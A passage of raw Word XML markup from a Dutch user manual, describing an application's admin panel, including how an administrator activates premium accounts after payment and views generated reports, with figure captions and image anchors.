            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F3FC8A" w14:textId="448ED701" w:rsidR="00A958DB" w:rsidRDefault="00A958DB" w:rsidP="00243FA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="743A7DD3" w14:textId="3E8A5EA4" w:rsidR="007E550D" w:rsidRDefault="007E550D" w:rsidP="00243FA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CC9ADA1" w14:textId="2126CDA9" w:rsidR="007E550D" w:rsidRDefault="007E550D" w:rsidP="00243FA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0016C82B" w14:textId="13F2554A" w:rsidR="007E550D" w:rsidRDefault="007E550D" w:rsidP="00243FA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0509C276" w14:textId="118D9419" w:rsidR="007E550D" w:rsidRDefault="0043602E" w:rsidP="00243FA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253215744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F772C5D" wp14:editId="44FCB7BE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1244600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>231140</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1642745" cy="737870"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="804" name="Text Box 804"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1642745" cy="737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79288E" w14:textId="1A85E70B" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0043602E">
                            <w:pPr>
                              <w:ind w:left="708" w:firstLine="708"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Figuur 5.5</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2E21CAF1" w14:textId="76B193B6" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0043602E">
                            <w:r>
                              <w:t>Figuur 5.7</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>Figuur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2C5D" id="Text Box 804" o:spid="_x0000_s1207" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:98pt;margin-top:18.2pt;width:129.35pt;height:58.1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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6179288E" w14:textId="1A85E70B" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0043602E">
                      <w:pPr>
                        <w:ind w:left="708" w:firstLine="708"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Figuur 5.5</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2E21CAF1" w14:textId="76B193B6" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0043602E">
                      <w:r>
                        <w:t>Figuur 5.7</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>Figuur 5.6</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00916499">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253065216" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4AF6088B" wp14:editId="3888A837">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-342900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1075055</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3241040" cy="2417445"/>
            <wp:effectExtent l="0" t="0" r="10160" b="0"/>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lijst met scan type.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId90">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3241040" cy="2417445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEC28B4" w14:textId="77777777" w:rsidR="007E550D" w:rsidRDefault="007E550D" w:rsidP="00243FA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:sectPr w:rsidR="007E550D" w:rsidSect="00512B06">
          <w:headerReference w:type="default" r:id="rId91"/>
          <w:headerReference w:type="first" r:id="rId92"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="773352EB" w14:textId="77777777" w:rsidR="00512B06" w:rsidRDefault="00512B06" w:rsidP="005C4EAA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0700F297" w14:textId="77777777" w:rsidR="00512B06" w:rsidRDefault="00512B06" w:rsidP="005C4EAA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="720C5FC8" w14:textId="1B0AA9F4" w:rsidR="00CB6C6E" w:rsidRDefault="00045A48" w:rsidP="005C4EAA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253069312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43FC027F" wp14:editId="1CD083BA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-918173</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1135529</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="750" name="Rectangle 7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1F38D" id="Rectangle 750" o:spid="_x0000_s1026" style="position:absolute;margin-left:-72.3pt;margin-top:-89.35pt;width:25pt;height:1031.7pt;z-index:-2502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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00557C84">
        <w:t xml:space="preserve">5.2 </w:t>
      </w:r>
      <w:r w:rsidR="00AB1EE1">
        <w:t>Admin Paneel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716628BD" w14:textId="77777777" w:rsidR="003F7243" w:rsidRDefault="003F7243" w:rsidP="00311403"/>
    <w:p w14:paraId="7735C821" w14:textId="6F67D60F" w:rsidR="003F7243" w:rsidRDefault="003F7243" w:rsidP="00562D15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Account Activatie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4F8903" w14:textId="1D809342" w:rsidR="00311403" w:rsidRPr="0043602E" w:rsidRDefault="0043602E" w:rsidP="00311403">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253217792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="689E1095" wp14:editId="4CC88BD7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5693410</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5751195</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="762000" cy="457200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="807" name="Text Box 807"/>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DA4F0" w14:textId="7C29A66C" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur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E1095" id="Text Box 807" o:spid="_x0000_s1208" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:448.3pt;margin-top:452.85pt;width:60pt;height:36pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="17CDA4F0" w14:textId="7C29A66C" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 5.9</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253216768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61A8D01D" wp14:editId="71E76724">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5626735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1633855</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="825500" cy="457200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="806" name="Text Box 806"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="825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DBEECD" w14:textId="6A6E1BFB" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur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8D01D" id="Text Box 806" o:spid="_x0000_s1209" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:443.05pt;margin-top:128.65pt;width:65pt;height:36pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7CDBEECD" w14:textId="6A6E1BFB" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 5.8</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253046784" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3CE1F3C2" wp14:editId="665CF5C8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4423410</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7005955</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="883920" cy="907415"/>
            <wp:effectExtent l="25400" t="25400" r="30480" b="32385"/>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remium active.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId93">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="883920" cy="9074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3045760" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B44B1F5" wp14:editId="220B41AA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-213360</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6433185</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5839460" cy="1712595"/>
                <wp:effectExtent l="0" t="0" r="27940" b="14605"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="722" name="Text Box 722"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5839460" cy="171259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1DDF4D4" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00311403">
                            <w:r>
                              <w:t xml:space="preserve">Na de betaling activeert de administrator het premiumaccount door op de knop “inactive” te drukken. Er verschijnt een bevestiging pop-up, de administrator klikt op “Activeer account” om het premium account te activ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B1F5" id="Text Box 722" o:spid="_x0000_s1210" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-16.8pt;margin-top:506.55pt;width:459.8pt;height:134.8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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="71DDF4D4" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00311403">
                      <w:r>
                        <w:t xml:space="preserve">Na de betaling activeert de administrator het premiumaccount door op de knop “inactive” te drukken. Er verschijnt een bevestiging pop-up, de administrator klikt op “Activeer account” om het premium account te activeren.   </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253044736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5BB03C5A" wp14:editId="684556A9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-213360</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3351530</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5839460" cy="2922270"/>
            <wp:effectExtent l="25400" t="25400" r="27940" b="24130"/>
            <wp:wrapSquare wrapText="bothSides"/>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activeer customer.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId94">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5839460" cy="292227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3043712" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6B618079" wp14:editId="7AF90750">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-210820</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2211070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5842000" cy="949960"/>
                <wp:effectExtent l="0" t="0" r="25400" b="15240"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="683" name="Text Box 683"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5842000" cy="9499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B2CFE3" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00656882" w:rsidRDefault="002A05E5" w:rsidP="00311403">
                            <w:r>
                              <w:t>Dit</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00656882">
                              <w:t xml:space="preserve"> is het Admin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18079" id="Text Box 683" o:spid="_x0000_s1211" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-16.6pt;margin-top:174.1pt;width:460pt;height:74.8pt;z-index:2530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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="07B2CFE3" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00656882" w:rsidRDefault="002A05E5" w:rsidP="00311403">
                      <w:r>
                        <w:t>Dit</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00656882">
                        <w:t xml:space="preserve"> is het Admin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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253042688" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="24AAFC45" wp14:editId="1081BA6E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-218440</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>257175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="1847215"/>
            <wp:effectExtent l="25400" t="25400" r="34290" b="32385"/>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customer inactief.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18472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868CB5E" w14:textId="36F88C7A" w:rsidR="004D0768" w:rsidRDefault="00512B06" w:rsidP="004D0768">
      <w:r w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253077504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F05B9EC" wp14:editId="7A93981A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-901874</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-717767</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="173" name="Rectangle 17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621BE" id="Rectangle 173" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71pt;margin-top:-56.45pt;width:25pt;height:1031.7pt;z-index:-2502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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A675004" w14:textId="77777777" w:rsidR="00512B06" w:rsidRDefault="00512B06" w:rsidP="004D0768">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="033E4126" w14:textId="786E351D" w:rsidR="004D0768" w:rsidRDefault="004D0768" w:rsidP="004D0768">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Rapporten inzien en verzenden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7D0C7C" w14:textId="5786EDA1" w:rsidR="004D0768" w:rsidRDefault="0043602E" w:rsidP="004D0768">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253218816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E57101A" wp14:editId="6DFA95B8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5690235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1960245</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="825500" cy="457200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="808" name="Text Box 808"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="825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7A364" w14:textId="5F496AFD" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur 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7101A" id="Text Box 808" o:spid="_x0000_s1212" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:448.05pt;margin-top:154.35pt;width:65pt;height:36pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5567A364" w14:textId="5F496AFD" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 5.10</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004D0768">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253070336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A2516CF" wp14:editId="62C5A2A3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-88265</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>247015</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="2198370"/>
            <wp:effectExtent l="25400" t="25400" r="34290" b="36830"/>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report admin.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219837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6FED8A8" w14:textId="39ED6197" w:rsidR="004D0768" w:rsidRDefault="0030794F" w:rsidP="004D0768">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253154304" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17CA5AA0" wp14:editId="6311F2AB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-25400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2338070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5651500" cy="688340"/>
                <wp:effectExtent l="0" t="0" r="38100" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="677" name="Text Box 677"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5651500" cy="6883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1509A5E" w14:textId="4C3DF569" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>De administrator kan met het rapportscherm informatie opvragen over alle gegenereerde rapporten. Zo kan de administrator zien van wie het rapport is en wat voor soort rapport het is. Ook is het mogelijk om het rapport in te zien door op het blauwe tekst te drukken in kolom report, dit opent het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A5AA0" id="Text Box 677" o:spid="_x0000_s1213" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-2pt;margin-top:184.1pt;width:445pt;height:54.2pt;z-index:2531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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="21509A5E" w14:textId="4C3DF569" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>De administrator kan met het rapportscherm informatie opvragen over alle gegenereerde rapporten. Zo kan de administrator zien van wie het rapport is en wat voor soort rapport het is. Ook is het mogelijk om het rapport in te zien door op het blauwe tekst te drukken in kolom report, dit opent het rapport.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CA7DE6" w14:textId="12CAF31A" w:rsidR="004D0768" w:rsidRDefault="0043602E" w:rsidP="004D0768">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253219840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0EDCF92D" wp14:editId="037E8D85">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5813425</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3631565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="762000" cy="457200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="809" name="Text Box 809"/>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678F8B" w14:textId="2152B2D4" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur 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CF92D" id="Text Box 809" o:spid="_x0000_s1214" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:457.75pt;margin-top:285.95pt;width:60pt;height:36pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
